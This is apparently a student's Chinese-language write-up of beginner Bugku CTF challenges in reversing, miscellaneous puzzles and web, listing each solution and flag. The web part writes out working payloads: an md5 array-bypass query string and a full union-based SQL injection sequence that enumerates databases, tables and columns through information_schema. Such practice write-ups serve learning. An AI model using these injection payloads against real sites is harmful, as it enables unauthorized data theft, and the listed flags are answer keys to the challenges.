bugku逆向和web部分

1、入门逆向

下载下来，拖进IDA

发现是ASCII字符flag的16进制，放到在线转换工具上直接出结果flag{Re_1s_S0_C0OL}

2、easy_vb

下载了easy_vb.exe文件，也是直接放进IDA，搜索——>text——>"{",就找到了flag{N3t_Rev_1s_E4ay}

3、easy_re

下载了re1.exe文件，也是直接放进IDA，在hex里面搜索字符串：flag，即可得到DUTCTF{We1c0met0DUTCTF}

4、玩个游戏

打开游戏exe文件，输入1到8数字，可得到zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t}，没搞明白

5、Timer(阿里CTF)

下载了一个apk文件。

6.逆向入门

用用notpad打开，开头有关png和base64，联想到base64转图片。转为图片后得到二维码，扫码得flag。bugku{inde_9882ihsd8-0}
或者使用HTML的img标签的src属性（格式为：<img src “url”/>），新建一个记事本，将复制的整段内容替换（<img src"url"/>)中的url，并保存为html的格式，用浏览器打开，得到二维码。

杂项题目

**

1、白哥的鸽子

**
拿到文件binwalk,一切正常；丢进010editor发现文件末位有fg2ivyo}l{2s3_o@aw__rcl@字符串；尝试3位栅栏密码得出flag{w22_is_v3ry_cool}@@
正确flag{w22_is_v3ry_cool}
**

2、zip伪加密

**
下载了一个zip加密的文件，打开的时候让输入密码，直接放入010 Editor，看到加密标志位如下：

红圈的四个数字中只有第二个数字对其有影响，其它的不管为何值，都不影响它的加密属性！
第二个数字为奇数时为zip加密，第二个数字为偶数时未加密，那么我们更改其标志位即可。保存并解压，可看到flag.txt文件。flag{Adm1N-B2G-kU-SZIP}
小知识：ZIP文件由三部分组成，分别是压缩源文件数据区、压缩源文件目录区和压缩源文件目录结束标志
压缩文件数据区初始位置：
压缩源文件目录区：

压缩文件目录区结束标志

##识别真假加密

识别真假加密
无加密

压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为00 00
假加密

压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为09 00
真加密

压缩源文件数据区的全局加密应当为09 00
且压缩源文件目录区的全局方式位标记应当为09 00

**

3、本地包含

**

直接url为（不太懂，但是先记录下来）
http://123.206.87.240:8004/index1.php?args=GLOBALS

即可出现flag:flag{92853051ab894a64f7865cf3c2128b34}

**

4、备份是个好习惯

**
题目标题为备份是个好习惯，故考虑修改url为index.php.bak，下载备份文件，看到源码。
可以看出题目需要我们传入两个值，分别为key1和key2，且key1和key2的值不能相同但md5值相同。md5()函数无法处理数组，如果传入的为数组，会返回NULL，所以两个数组经过加密后得到的都是NULL,也就是相等的。但是有一点需要注意,语句str_replace(‘key’,’ ',$str)会将key替换为空格，这一点我们可以通过双写key对其进行绕过。最终的payload:?kekeyy1[]=1&kekeyy2[]=2
**

5、成绩单

尝试在正常数据后加上单引号，发现数据为空，加个注释符发现依旧可以正常输出。id=2’ id=2’#
尝试获取列数，因为已经输出名字和3科分数，所以就猜4和5，得知查询结果中有4列(正常显示)。id=2’ order by 4#
尝试直接联合查询，这里要记得把前面查询id为空或负数。id=0’ union select 1,database(),user(),version()#
或 获取数据库名：id=0’ union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),user(),version()#
获取表名：id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘skctf_flag’),user(),version()#
获取列名：id=0’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘skctf_flag’ and table_name=‘fl4g’),user(),version()#
获取列中内容：id=0’ union select 1,(select skctf_flag from fl4g),user(),version()#
（本表结构：数据库名skctf_flag，表两个：fl4g，sc. fl4g只有一列名：skctf_flag）
最后获取flag:BUGKU{Sql_INJECT0N_4813drd8hz4}